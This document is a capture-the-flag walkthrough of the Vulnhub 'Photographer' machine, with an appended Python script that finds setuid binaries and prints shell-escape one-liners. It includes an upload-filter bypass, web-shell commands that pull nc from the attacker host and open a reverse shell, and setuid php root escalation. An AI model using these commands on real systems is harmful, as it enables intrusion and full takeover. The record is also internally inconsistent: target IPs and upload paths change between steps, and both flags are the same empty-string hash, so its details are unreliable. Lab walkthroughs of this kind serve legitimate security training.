[Vulnhub] - Photographer

Today we are going to hack the Vulnhub machine called Photographer. You can download it from the following link: https://www.vulnhub.com/entry/photographer-1,519/
  • Enumeration
    We start with an nmap scan of all ports to see which ones are open.
    ~ > nmap -A -p- 192.168.1.80
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 03:04 CEST
    Nmap scan report for photographer.home (192.168.1.80)
    Host is up (0.00035s latency).
    Not shown: 65531 closed ports
    PORT     STATE SERVICE     VERSION
    80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Photographer by v1n1v131r4
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
    |_http-generator: Koken 0.22.24
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: daisa ahomi
    Service Info: Host: PHOTOGRAPHER

    Host script results:
    |_clock-skew: mean: 21h20m17s, deviation: 2h18m34s, median: 20h00m17s
    |_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: photographer
    |   NetBIOS computer name: PHOTOGRAPHER\x00
    |   Domain name: \x00
    |   FQDN: photographer
    |_  System time: 2020-07-27T17:04:34-04:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-07-27T21:04:33
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 19.58 seconds
    Two web servers (80 and 8000, the latter fingerprinted as Koken 0.22.24) and Samba, which nmap already reports as accepting a guest account. We start with Samba and check whether it is sharing any folders.
    ~ > smbclient -L 192.168.1.80
    Enter WORKGROUP\sml's password:

            Sharename       Type      Comment
            ---------       ----      -------
            print$          Disk      Printer Drivers
            sambashare      Disk      Samba on Ubuntu
            IPC$            IPC       IPC Service (photographer server (Samba, Ubuntu))
    SMB1 disabled -- no workgroup available
    We connect to the sambashare folder. No password is needed: an empty one is accepted, so the share is readable by anyone on the network.
    ~ > smbclient \\\\192.168.1.80\\sambashare
    Enter WORKGROUP\sml's password:
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Tue Jul 21 03:30:07 2020
      ..                                  D        0  Tue Jul 21 11:44:25 2020
      mailsent.txt                        N      503  Tue Jul 21 03:29:40 2020
      wordpress.bkp.zip                   N 13930308  Tue Jul 21 03:22:23 2020

                    278627392 blocks of size 1024. 264268400 blocks available
    It holds a couple of files. We download mailsent.txt.
    smb: \> get mailsent.txt
    getting file \mailsent.txt of size 503 as mailsent.txt (163,7 KiloBytes/sec) (average 163,7 KiloBytes/sec)
    Let's look at its contents.
    ~ > cat mailsent.txt
    Message-ID: <4129F3CA.2020509@dc.edu>
    Date: Mon, 20 Jul 2020 11:40:36 -0400
    From: Agi Clarence
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
    X-Accept-Language: en-us, en
    MIME-Version: 1.0
    To: Daisa Ahomi
    Subject: To Do - Daisa Website's
    Content-Type: text/plain; charset=us-ascii; format=flowed
    Content-Transfer-Encoding: 7bit

    Hi Daisa!
    Your site is ready now.
    Don't forget your secret, my babygirl ;)
    From this text we can pull a likely username, "daisa", the e-mail address daisa@photographer.com and, finally, "babygirl", which looks very much like a password :) We keep exploring the services, in this case port 8000.
    ~ > dirb http://192.168.1.80:8000 /usr/share/wordlists/dirb/big.txt -f

    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Mon Jul 27 03:10:10 2020
    URL_BASE: http://192.168.1.80:8000/
    WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
    OPTION: Fine tunning of NOT_FOUND detection

    -----------------

    GENERATED WORDS: 20458

    ---- Scanning URL: http://192.168.1.80:8000/ ----
    + http://192.168.1.79:8000/.bash_history (CODE:302|SIZE:0)
    + http://192.168.1.79:8000/.bashrc (CODE:302|SIZE:0)
    + http://192.168.1.79:8000/.cvs (CODE:302|SIZE:0)
    + http://192.168.1.79:8000/.cvsignore (CODE:302|SIZE:0)
    + http://192.168.1.79:8000/.forward (CODE:302|SIZE:0)
    + http://192.168.1.79:8000/access_log.1 (CODE:302|SIZE:0)
    ==> DIRECTORY: http://192.168.1.80:8000/admin/
    ==> DIRECTORY: http://192.168.1.80:8000/app/
    + http://192.168.1.80:8000/asdfjkl; (CODE:301|SIZE:0)
    + http://192.168.1.80:8000/cgi-bin/ (CODE:302|SIZE:0)
    ---SNIP---
    There is an "admin" folder. Browsing to http://192.168.1.80:8000/admin/ asks for credentials; we use daisa@photographer.com / babygirl and we are in :) We look for an exploit for this version of Koken and find the following one[1]: create a file named x.php.jpg, upload it through the dashboard, and intercept the upload request with Burp to strip the .jpg from the filename, so the server stores it as a .php file. We start by creating the file.
    ~ > nano image.php.jpg
    We start Burp to intercept the request when we do the upload. In the Koken dashboard we click "Import content" and select the file we just created. We intercept the request and remove the .jpg from the filename. Once the modified request has been forwarded, we turn Burp off and hover over "Download file" in the Koken dashboard to see where the uploaded file ended up. It is at the following URL: http://192.168.1.80:8000/storage/originals/09/0e/image.php. Through the "cmd" parameter of that file we will download nc from our machine, make it executable and launch a reverse shell. First we put nc listening:
    ~ > nc -nlvp 5555
    Then we use the "cmd" parameter, one request per step, to get the reverse shell with the nc we serve from our machine (the browser percent-encodes the spaces for us):
    http://192.168.1.80:8000/storage/originals/09/0e/image.php?cmd=wget http://192.168.1.111/nc -O /tmp/nc
    http://192.168.1.80:8000/storage/originals/09/0e/image.php?cmd=chmod 777 /tmp/nc
    http://192.168.1.80:8000/storage/originals/09/0e/image.php?cmd=/tmp/nc -e /bin/bash 192.168.1.111 5555
  • Low Shell
    The listener receives the connection and we upgrade to a full TTY with python:

    ~ > nc -nlvp 5555
    listening on [any] 5555 ...
    connect to [192.168.1.111] from (UNKNOWN) [192.168.1.79] 55916
    python -c 'import pty;pty.spawn("/bin/bash")'
    www-data@photographer:/var/www/html/koken/storage/originals/71/5c$
  • user.txt
    We look around the home directories for anything interesting.
    www-data@photographer:/home$ ls
    agi  daisa  lost+found
    www-data@photographer:/home$ cd daisa
    www-data@photographer:/home/daisa$ cat user.txt
    d41d8cd98f00b204e9800998ecf8427e
    We explore the system to see whether we can find something that helps us escalate privileges. A quick first check is the list of setuid binaries.
  • Privilege Escalation
    www-data@photographer:/tmp$ find / -perm -4000 2>/dev/null
    ---SNIP---
    /usr/lib/snapd/snap-confine
    /usr/lib/openssh/ssh-keysign
    /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/sbin/pppd
    /usr/bin/pkexec
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/gpasswd
    /usr/bin/php7.2
    ---SNIP---
    /usr/bin/php7.2 has the SUID bit set, so it runs with an effective uid of root whoever calls it. We use it to escalate privileges :) php's pcntl_exec() replaces the process with /bin/sh while keeping that euid, and the -p flag tells the shell not to drop it back to the real uid. (The exported CMD variable below is not used by the one-liner; the command works the same without it.)
    www-data@photographer:/tmp$ export CMD="/bin/sh"
    www-data@photographer:/tmp$ /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
    # id
    uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
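    The `find / -perm -4000` step and the triage that followed it, as an added example that is not part of the write-up: it walks a tree, collects setuid/setgid files and flags the ones whose class hands the caller an exec with the elevated euid kept (interpreters like php7.2, and utilities with a shell escape), then prints the matching one-liner. Only the php one-liner is from the page; the python and perl equivalents, and the INTERPRETERS / SHELL_SPAWNERS lists, are my own illustrative additions. The demo() fixture is constructed so the audit can run offline.

```python
#!/usr/bin/env python3
"""Added example (not from the write-up): `find / -perm -4000` with triage.

A setuid-root file matters when it lets the caller execute something else
while keeping euid 0. Interpreters always do (php's pcntl_exec, python's
os.execl, perl's exec); a few utilities do through a shell escape. The two
tuples below are illustrative subsets chosen for this example, not a
complete list.
"""
import os
import shutil
import stat
import tempfile
from typing import Dict, List

INTERPRETERS = ("php", "python", "perl", "ruby", "node", "lua", "bash", "sh", "dash")
SHELL_SPAWNERS = ("find", "vim", "vi", "nmap", "env", "awk", "less", "more", "cp", "mv", "tar")
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")   # noisy, and can hang a walk


def _stem(path: str) -> str:
    """'/usr/bin/php7.2' -> 'php': drop a trailing version suffix."""
    return os.path.basename(path).rstrip("0123456789.")


def classify(path: str) -> str:
    name = _stem(path)
    if name in INTERPRETERS:
        return "interpreter"
    if name in SHELL_SPAWNERS:
        return "shell-spawner"
    return "other"


def find_setid(root: str) -> List[Dict]:
    """Regular files under root carrying the setuid or setgid bit."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                st = os.lstat(p)   # lstat: never follow symlinks out of the tree
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            suid, sgid = bool(st.st_mode & stat.S_ISUID), bool(st.st_mode & stat.S_ISGID)
            if suid or sgid:
                found.append({"path": p, "suid": suid, "sgid": sgid,
                              "owner": st.st_uid, "kind": classify(p)})
    return found


def triage(found: List[Dict]) -> List[Dict]:
    """Setuid files whose class hands the caller an exec: try these first."""
    return [f for f in found if f["suid"] and f["kind"] != "other"]


def privesc_oneliner(entry: Dict) -> str:
    """The page's php trick (from the write-up) and its python/perl analogues
    (my addition). All keep the euid via `sh -p`."""
    path = entry["path"]
    table = {
        "php":    f"{path} -r \"pcntl_exec('/bin/sh', ['-p']);\"",
        "python": f"{path} -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
        "perl":   f"{path} -e 'exec \"/bin/sh\", \"-p\";'",
    }
    return table.get(_stem(path), f"no one-liner in this example for {_stem(path)}")


def demo() -> Dict[str, Dict]:
    """Constructed fixture: a throwaway tree mimicking lines of the page's find
    output. The owner of a file may set its setuid bit, so no root is needed."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    try:
        for name, mode in (("php7.2", 0o4755), ("passwd", 0o4755),
                           ("wall", 0o2755), ("ls", 0o755)):
            p = os.path.join(root, "usr", "bin", name)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            open(p, "wb").close()
            os.chmod(p, mode)
        return {os.path.basename(f["path"]): f for f in find_setid(root)}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for e in triage(find_setid("/")):
        print(f"{e['path']} (owner uid {e['owner']}): {privesc_oneliner(e)}")
```

    Run as the low-privilege user it does what the manual find did, but the output is already sorted into "stock setuid helper" versus "setuid thing that will exec a shell for me", which on this box points straight at /usr/bin/php7.2. The same walk, run from the defender's side, is a cheap baseline check: any interpreter in the setuid list is a misconfiguration regardless of what else is on the host.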
  • proof.txt
    # cd /root
    # ls
    proof.txt
    # cat proof.txt
    (ASCII-art banner)
    Follow me at: http://v1n1v131r4.com
    d41d8cd98f00b204e9800998ecf8427e
  • End
    And with that we are root on the machine.

    [1] https://www.exploit-db.com/exploits/48706